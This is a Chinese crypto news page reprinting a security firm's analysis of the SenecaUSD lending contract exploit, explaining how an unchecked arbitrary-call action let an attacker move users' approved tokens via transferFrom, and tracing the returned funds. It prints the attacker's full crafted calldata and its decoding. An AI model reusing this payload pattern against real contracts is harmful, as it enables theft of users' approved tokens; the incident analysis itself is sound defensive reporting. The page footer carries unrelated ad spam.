校验缺失 —— 借贷项目 SenecaUSD 安全事件分析_每日快讯(日常热点指南)

校验缺失 —— 借贷项目 SenecaUSD 安全事件分析


校验缺失 —— 借贷项目 SenecaUSD 安全事件分析

  2024-03-05 10:19:47     简体|繁體
http://news.qghjm.com/1050111.html

数字货币网报道:

北京时间2024年2月28日,据Beosin trace资金分析平台显示,ETH链上的SenecaUSD项目合约存在漏洞,黑客利用精心构造的calldata参数,调用transferfrom将授权到该项目合约的代币转移到自己地址上,最后兑换为ETH。目前黑客已归还80%资金,剩余20%用作白帽奖励。以下是Beosin对此次攻击事件的分析。

漏洞分析

Seneca项目合约中存在一个performOperations函数,该函数传入的参数来选择执行不同的函数逻辑。

可以看到,当用户指定action为30时,函数将选择调用_call函数,并且传入用户指定的调用参数。

_call函数只检查了一下调用地址的黑名单,随后便直接调用了用户指定地址的指定函数,期间并未对调用者以及调用参数做任何限制性检查。

如果调用者在这里构造非法的调用数据,便可能导致攻击事件的发生。

攻击流程

本次事件攻击者通过多次相同的手法进行攻击,这里以0x23fcf9d4517f7cc39815b09b0a80c023ab2c8196c826c93b4100f2e26b701286这笔交易为例。我们来看看此次攻击者是如何构造调用数据以及实施攻击的。

1. 攻击者直接调用performOperations函数,并构造了以下参数,其中actions传入了上述的30,将调用_call函数。

2. Datas数据为:

0x000000000000000000000000b05cabcd99cf9a73b19805edefc5f67ca5d1895e

00000000000000000000000000000000000000000000000000000000000000a0

0000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000064

23b872dd0000000000000000000000009cbf099ff424979439dfba03f00b5961

784c06ce00000000000000000000000094641c01a4937f2c8ef930580cf39614

2a2942dc00000000000000000000000000000000000000000000004b180b8661

8eddc3ab00000000000000000000000000000000000000000000000000000000

根据解析规则来看,第一个32字节为callee=0xb05cabcd99cf9a73b19805edefc5f67ca5d1895e。

第二个callData在a0处,100(0x64)字节,则得到

callData为:

0x23b872dd0000000000000000000000009cbf099ff424979439dfba03f00b5961784c06ce00000000000000000000000094641c01a4937f2c8ef930580cf396142a2942dc00000000000000000000000000000000000000000000004b180b86618eddc3ab

3. 查询函数选择器,根据callData数据可知,callData指定的是transferFrom函数。那本次调用我们可以解析出来为:

0xb05cabcd99cf9a73b19805edefc5f67ca5d1895e.transferFrom(0x9cbf099ff424979439dfba03f00b5961784c06ce,0x94641c01a4937f2c8ef930580cf396142a2942dc,1385238431763437306795)。

4. 由于在之前的交易中,0x9cbf099ff424979439dfba03f00b5961784c06ce向0x65c210c59b43eb68112b7a4f75c8393c36491f06地址授权过最大值,所以这里攻击者通过transferFrom函数直接将0x9cbf099ff424979439dfba03f00b5961784c06ce的超1385枚PT-rsETH-27JUN2024(0xb05cabcd99cf9a73b19805edefc5f67ca5d1895e)代币转移到自己的地址上

5. 随后攻击者将PT-rsETH-27JUN2024代币兑换为ETH。

资金追踪

在被攻击后,Seneca部署者向攻击者喊话,要求攻击者归还资金,并表示可以保留20%的资金作为白帽奖励。

据Beosin trace资金追踪平台显示,截止发稿,攻击者已将被盗1900多枚ETH中的1537枚ETH(80%)归还到部署者指定地址,剩余370枚ETH(20%)分散保留在攻击者地址上。



编辑:web3528btc 来源:加密钱包代币

免责声明:以上文章内容信息均搜集自互联网或用户发布,并不代表本站观点或立场,本站不对其真实合法性负责。如有信息侵犯了您的权益,请联系本站将立即删除。
分享到:

  • 上一篇
    下一篇

  • 今日要闻|实事关注

    每日快讯(日常热点指南)
    手机查看(二维码扫一扫)

    每日快讯网为您提供最新的行业简讯、新闻报道,以及今日热点内容,重大事件等实时资讯,24小时不间断播报,让您获得最新行业信息。
    « 2025年 » « 12月 »
    1234567
    891011121314
    15161718192021
    22232425262728
    293031

    最新资讯

    提供财商、证券、保险等大金融有好量,找甲方
  • 2026-01-15 20:39:54

     

    我是山东联宇的广告销售刘业传,[代运营托管]抖音本地推对公13收量,千川对私4.5收,我们是乙方综合性服务商,欢迎点击对接合作与我联系。
  • 2026-01-15 20:31:48

     

    我是云狄网络的广告销售余思雨,[开户代运营]千川白牌对私4 品牌4.5 团购公14私16 线索公10私12不用配合直签AD 部分行业收对私,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-01-15 20:23:42

     

    我是杭州激石的商务专员胡思思,[开户代运营]全国各地 广点通、抖音 学历提升(专本、研究生)首咨,量大质优!欢迎甲方机构沟通合作,我们是,欢迎点击对接合作与我联系。
  • 2026-01-15 20:15:36

     

    我是奕宸网络的销售经理张秀杰,[开户代运营]本地推医美套户 双眼皮,玻尿酸,超声炮,热玛吉,童颜针,少女针,黄金微针,热拉提等,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-01-15 20:07:30

     

    我是有信科技的市场总监卢文羽,[开户代运营]腾讯朋友圈广告,视频号,禁投限制行业接单,无资质单,特殊行业,源头端口,套户现户资质全包!,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-01-15 19:59:24

     

    我是晟景时代的商务总监莫云山,[开户代运营]社群养生出粉:貂绒大衣 买菜小推车 养生壶 驼绒被 驼绒马甲 绞肉机 暖菜板 艾灸枕鞋毯 价格美丽 有量可切[勾引],我们是推广代运营服务商,欢迎点击对
  • 2026-01-15 19:51:17

     

    我是陕西启维的营销总监惠建军,[开户代运营]闲鱼广告服务,一代高点收量,适配个人/商家不同需求,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-01-15 19:43:11

     

    我是广州博芯的商务经理刘焕鹏,[开户代运营]千川一代端口开户收量品牌对公2.5白牌对公1.5对私3,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-01-15 19:35:08

     

    我是奕维网络的销售总监陈小凡,[开户代运营]抖音本地推生美 ​本地推妇产 ​本地推口腔 ​本地推体检有户 痛风 胃肠 甲状腺 耳鼻,可自运营可代运营,我们是乙方综合性服务商,欢迎点击对接合作与我联系
  • 2026-01-15 19:26:59

     

    恭喜俄罗斯与乌克兰,打了近4年,终于打成了全世界都喜欢的样子
  • 2026-01-15 19:18:53

     

    前脚刚吹嘘空中战果,后脚F16V坠海,到底是技术不行还是另有隐情?
  • 2026-01-15 19:10:47

     

    高市安排秘密惊喜,李在明高兴坏了,但中方说的话,一点也没敢忘
  • 2026-01-15 19:02:40

     

    天宇迎来本年度最小残月
  • 2026-01-15 18:54:34

     

    市民群众点赞厦门出入境“夜办专场”很体贴
  • 2026-01-15 18:46:28